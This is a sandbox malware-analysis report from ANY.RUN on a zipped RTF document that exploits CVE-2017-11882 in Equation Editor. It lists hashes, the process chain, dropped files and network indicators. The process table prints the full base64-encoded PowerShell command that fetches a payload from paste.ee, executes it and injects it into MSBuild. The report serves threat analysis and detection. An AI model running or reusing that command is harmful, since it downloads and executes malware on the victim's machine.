analyze malware
  • Huge database of samples and IOCs
  • Custom VM setup
  • Unlimited submissions
  • Interactive approach
Sign up, it’s free
File name:

6666472573665280.zip

Full analysis: https://app.any.run/tasks/b5b2b3af-6d52-4bea-9945-f2f55aa2f142
Verdict: Malicious activity
Threats:

Trojans are a group of malicious programs distinguished by their ability to masquerade as benign software. Depending on their type, trojans possess a variety of capabilities, ranging from maintaining full remote control over the victim’s machine to stealing data and files, as well as dropping other malware. At the same time, the main functionality of each trojan family can differ significantly depending on its type. The most common trojan infection chain starts with a phishing email.

Malware Trends Tracker     >>>
Analysis date: July 12, 2020, 13:33:51
OS: Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Tags:
exploit
CVE-2017-11882
trojan
Indicators:
MIME: application/zip
File info: Zip archive data, at least v2.0 to extract
MD5:

5F04B7F03D5AC303A61109B479566742

SHA1:

08C18558E7A54F8FD6A895266457EBC7DF088F56

SHA256:

C7CB1A1FDAB3771930E95E58D3DCF30FF65EE43CEF3AAA339F0CEB1773AE57FE

SSDEEP:

3072:X8MRL88SNDrAo3nhMHr7ar7RBcTkMz2SylhTM:X8Ma8SNX/hACrNB22SyfTM

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.

  • MALICIOUS

    • Application was dropped or rewritten from another process

      • 908.exe (PID: 3952)

    • Equation Editor starts application (CVE-2017-11882)

      • EQNEDT32.EXE (PID: 2164)

  • SUSPICIOUS

    • Creates files in the user directory

      • EQNEDT32.EXE (PID: 2164)
      • powershell.exe (PID: 2180)

    • Reads Internet Cache Settings

      • EQNEDT32.EXE (PID: 2164)

    • Executed via COM

      • EQNEDT32.EXE (PID: 2164)

    • Executable content was dropped or overwritten

      • EQNEDT32.EXE (PID: 2164)

    • Executes PowerShell scripts

      • 908.exe (PID: 3952)

  • INFO

    • Manual execution by user

      • WINWORD.EXE (PID: 2700)

    • Reads Microsoft Office registry keys

      • WINWORD.EXE (PID: 2700)

    • Creates files in the user directory

      • WINWORD.EXE (PID: 2700)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.

TRiD

.zip | ZIP compressed archive (100)

EXIF

ZIP

ZipRequiredVersion: 20
ZipBitFlag: 0x0009
ZipCompression: Deflated
ZipModifyDate: 1980:00:00 00:00:00
ZipCRC: 0xaec81cc5
ZipCompressedSize: 115625
ZipUncompressedSize: 508916
ZipFileName: e7e4957edd94d6bfb8b321d1bcce32a7450bf507f0267974038d1e64b1223389
No data.
screenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
53
Monitored processes
17
Malicious processes
2
Suspicious processes
0

Behavior graph

Click at the process to see the details
start drop and start winrar.exe no specs winword.exe no specs eqnedt32.exe 908.exe powershell.exe msbuild.exe no specs msbuild.exe no specs msbuild.exe no specs msbuild.exe no specs msbuild.exe no specs msbuild.exe no specs msbuild.exe no specs msbuild.exe no specs msbuild.exe no specs msbuild.exe no specs msbuild.exe no specs msbuild.exe no specs

Process information

PID
CMD
Path
Indicators
Parent process
452"C:\Program Files\WinRAR\WinRAR.exe" "C:\Users\admin\AppData\Local\Temp\6666472573665280.zip"C:\Program Files\WinRAR\WinRAR.exeexplorer.exe
User:
admin
Company:
Alexander Roshal
Integrity Level:
MEDIUM
Description:
WinRAR archiver
Version:
5.60.0
2700"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\Desktop\e7e4957edd94d6bfb8b321d1bcce32a7450bf507f0267974038d1e64b1223389.rtf"C:\Program Files\Microsoft Office\Office14\WINWORD.EXEexplorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft Word
Version:
14.0.6024.1000
2164"C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -EmbeddingC:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
svchost.exe
User:
admin
Company:
Design Science, Inc.
Integrity Level:
MEDIUM
Description:
Microsoft Equation Editor
Exit code:
0
Version:
00110900
3952C:\Users\Public\908.exeC:\Users\Public\908.exe
EQNEDT32.EXE
User:
admin
Integrity Level:
MEDIUM
Exit code:
0
Version:
1.0.0.0
2180"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy bypass -w 1 /e JAByAGUAZwAgAD0AIAAoACcAewAyAH0AewAwAH0AewAxAH0AewAzAH0AJwAtAGYAJwBkAFMAdAAnACwAJwByAGkAbgAnACwAHCBgAEQAYABvAGAAdwBuAGAAbABgAG8AYQAdICwAJwBnACcAKQA7AFsAdgBvAGkAZABdACAAWwBTAHkAcwB0AGUAbQAuAFIAZQBmAGwAZQBjAHQAaQBvAG4ALgBBAHMAcwBlAG0AYgBsAHkAXQA6ADoATABvAGEAZABXAGkAdABoAFAAYQByAHQAaQBhAGwATgBhAG0AZQAoACcATQBpAGMAcgBvAHMAbwBmAHQALgBWAGkAcwB1AGEAbABCAGEAcwBpAGMAJwApADsAJABmAGoAPQBbAE0AaQBjAHIAbwBzAG8AZgB0AC4AVgBpAHMAdQBhAGwAQgBhAHMAaQBjAC4ASQBuAHQAZQByAGEAYwB0AGkAbwBuAF0AOgA6AEMAYQBsAGwAQgB5AG4AYQBtAGUAKAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIAAcIGAATgBgAGUAYABUAGAALgBgAFcAYABlAGAAQgBgAEMAYABsAGAAaQBgAGUAYABOAGAAVAAdICkALAAkAHIAZQBnACwAWwBNAGkAYwByAG8AcwBvAGYAdAAuAFYAaQBzAHUAYQBsAEIAYQBzAGkAYwAuAEMAYQBsAGwAVAB5AHAAZQBdADoAOgBNAGUAdABoAG8AZAAsACcAaAB0AHQAJwArAFsAQwBoAGEAcgBdADgAMAArACcAJwAgACsAIABbAEMAaABhAHIAXQA1ADgAIAArACAAJwAvAC8AcABhAHMAdABlAC4AZQBlAC8AcgAvADcASgBQAHoARAAnACkALgBSAGUAcABsAGEAYwBlACgAIgBeACIALAAgACIANAA0ACIAKQAuAFIAZQBwAGwAYQBjAGUAKAAiACoAIgAsACAAIgA0ADgAIgApAC4AUgBlAHAAbABhAGMAZQAoACIAIwAiACwAIAAiADcAOAAiACkAfABJAEUAWAA7AFsAQgB5AHQAZQBbAF0AXQAkAGYAPQBbAE0AaQBjAHIAbwBzAG8AZgB0AC4AVgBpAHMAdQBhAGwAQgBhAHMAaQBjAC4ASQBuAHQAZQByAGEAYwB0AGkAbwBuAF0AOgA6AEMAYQBsAGwAQgB5AG4AYQBtAGUAKAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIAAcIGAATgBgAGUAYABUAGAALgBgAFcAYABlAGAAQgBgAEMAYABsAGAAaQBgAGUAYABOAGAAVAAdICkALAAkAHIAZQBnACwAWwBNAGkAYwByAG8AcwBvAGYAdAAuAFYAaQBzAHUAYQBsAEIAYQBzAGkAYwAuAEMAYQBsAGwAVAB5AHAAZQBdADoAOgBNAGUAdABoAG8AZAAsACcAaAB0AHQAJwArAFsAQwBoAGEAcgBdADgAMAArACcAcwAnACAAKwAgAFsAQwBoAGEAcgBdADUAOAAgACsAIAAnAC8ALwBwAGEAcwB0AGUALgBlAGUALwByAC8AegBJAFYAVAA0ACcAKQAuAHIAZQBwAGwAYQBjAGUAKAAnACQAJAAnACwAJwAwAHgAJwApAHwASQBFAFgAOwBbAEMALgBNAF0AOgA6AFIAKAAnAE0AUwBCAHUAaQBsAGQALgBlAHgAZQAnACwAJABmACkAC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
908.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
0
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
2992"C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe"C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exepowershell.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
MSBuild.exe
Exit code:
4294967295
Version:
2.0.50727.5420 built by: Win7SP1
3352"C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe"C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exepowershell.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
MSBuild.exe
Exit code:
4294967295
Version:
2.0.50727.5420 built by: Win7SP1
1600"C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe"C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exepowershell.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
MSBuild.exe
Exit code:
4294967295
Version:
2.0.50727.5420 built by: Win7SP1
3844"C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe"C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exepowershell.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
MSBuild.exe
Exit code:
4294967295
Version:
2.0.50727.5420 built by: Win7SP1
764"C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe"C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exepowershell.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
MSBuild.exe
Exit code:
4294967295
Version:
2.0.50727.5420 built by: Win7SP1
Total events
2 648
Read events
1 463
Write events
0
Delete events
0

Modification events

No data
Executable files
2
Suspicious files
4
Text files
4
Unknown types
5

Dropped files

PID
Process
Filename
Type
452WinRAR.exeC:\Users\admin\AppData\Local\Temp\Rar$DRb452.18461\e7e4957edd94d6bfb8b321d1bcce32a7450bf507f0267974038d1e64b1223389
MD5:
SHA256:
2700WINWORD.EXEC:\Users\admin\AppData\Local\Temp\CVRDC1C.tmp.cvr
MD5:
SHA256:
2164EQNEDT32.EXEC:\Users\admin\AppData\Local\Temp\CabEAD2.tmp
MD5:
SHA256:
2164EQNEDT32.EXEC:\Users\admin\AppData\Local\Temp\TarEAD3.tmp
MD5:
SHA256:
2180powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\E9RCLLP4LU83XBJX3FJ5.temp
MD5:
SHA256:
2164EQNEDT32.EXEC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\78RFYB7Z\2CdbU6t[1].htmhtml
MD5:7FACEB4149CAAF8167A76E2A0E8301EF
SHA256:A8222578E1918CD998ACA33A136DD48D2975AD3812661455431C6E7E4D18007E
2700WINWORD.EXEC:\Users\admin\AppData\Roaming\Microsoft\Office\Recent\e7e4957edd94d6bfb8b321d1bcce32a7450bf507f0267974038d1e64b1223389.rtf.LNKlnk
MD5:CA5474593D1E86DABC25FB9F67C7B18F
SHA256:90FEAB3365B2B623DAFA5A81CFE97133D893A16F3FA34EC17C0FF9BEB533911A
2700WINWORD.EXEC:\Users\admin\AppData\Roaming\Microsoft\Templates\~$Normal.dotmpgc
MD5:64AD84B5B090E5825F9DB270461D2C88
SHA256:2D069E2B42B7F15C16D48791E45038145BB5CBC750A3FBC567ED6FF71401584E
2164EQNEDT32.EXEC:\Users\Public\908.exeexecutable
MD5:60659527CBFF3CF09DC3A611D0CEFD45
SHA256:EAC28940100A88348FDED33B007FC34D31958A890734C43D948B4C988297A53E
2164EQNEDT32.EXEC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\B6QGX7LP\iK8oI[1].txtexecutable
MD5:60659527CBFF3CF09DC3A611D0CEFD45
SHA256:EAC28940100A88348FDED33B007FC34D31958A890734C43D948B4C988297A53E
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
4
TCP/UDP connections
7
DNS requests
5
Threats
0

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
2164
EQNEDT32.EXE
GET
200
2.16.186.35:80
http://isrg.trustid.ocsp.identrust.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBRv9GhNQxLSSGKBnMArPUcsHYovpgQUxKexpHsscfrb4UuQdf%2FEFWCFiRACEAoBQUIAAAFThXNqC4Xspwg%3D
unknown
der
1.37 Kb
whitelisted
2164
EQNEDT32.EXE
GET
301
67.199.248.10:80
http://bit.ly/2CdbU6t
US
html
116 b
shared
3952
908.exe
GET
301
104.18.49.20:80
http://paste.ee/r/6FUSS
US
html
162 b
shared
2180
powershell.exe
GET
301
104.18.49.20:80
http://paste.ee/r/7JPzD
US
html
162 b
shared
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
2164
EQNEDT32.EXE
67.199.248.10:80
bit.ly
Bitly Inc
US
shared
2164
EQNEDT32.EXE
5.79.72.163:443
u.teknik.io
LeaseWeb Netherlands B.V.
NL
malicious
2164
EQNEDT32.EXE
2.16.186.35:80
isrg.trustid.ocsp.identrust.com
Akamai International B.V.
whitelisted
3952
908.exe
104.18.49.20:80
paste.ee
Cloudflare Inc
US
shared
2180
powershell.exe
104.18.49.20:80
paste.ee
Cloudflare Inc
US
shared
3952
908.exe
104.18.49.20:443
paste.ee
Cloudflare Inc
US
shared
2180
powershell.exe
104.18.49.20:443
paste.ee
Cloudflare Inc
US
shared

DNS requests

Domain
IP
Reputation
bit.ly
  • 67.199.248.10
  • 67.199.248.11
shared
u.teknik.io
  • 5.79.72.163
whitelisted
isrg.trustid.ocsp.identrust.com
  • 2.16.186.35
  • 2.16.186.11
whitelisted
paste.ee
  • 104.18.49.20
  • 104.18.48.20
  • 172.67.219.133
shared
pastecode.xyz
malicious

Threats

Found threats are available for the paid subscriptions
2 ETPRO signatures available at the full report
No debug info
Interactive malware hunting service ANY.RUN
© 2017-2024 ANY.RUN LLC. ALL RIGHTS RESERVED
ANY.RUN
Reports
6666472573665280.zip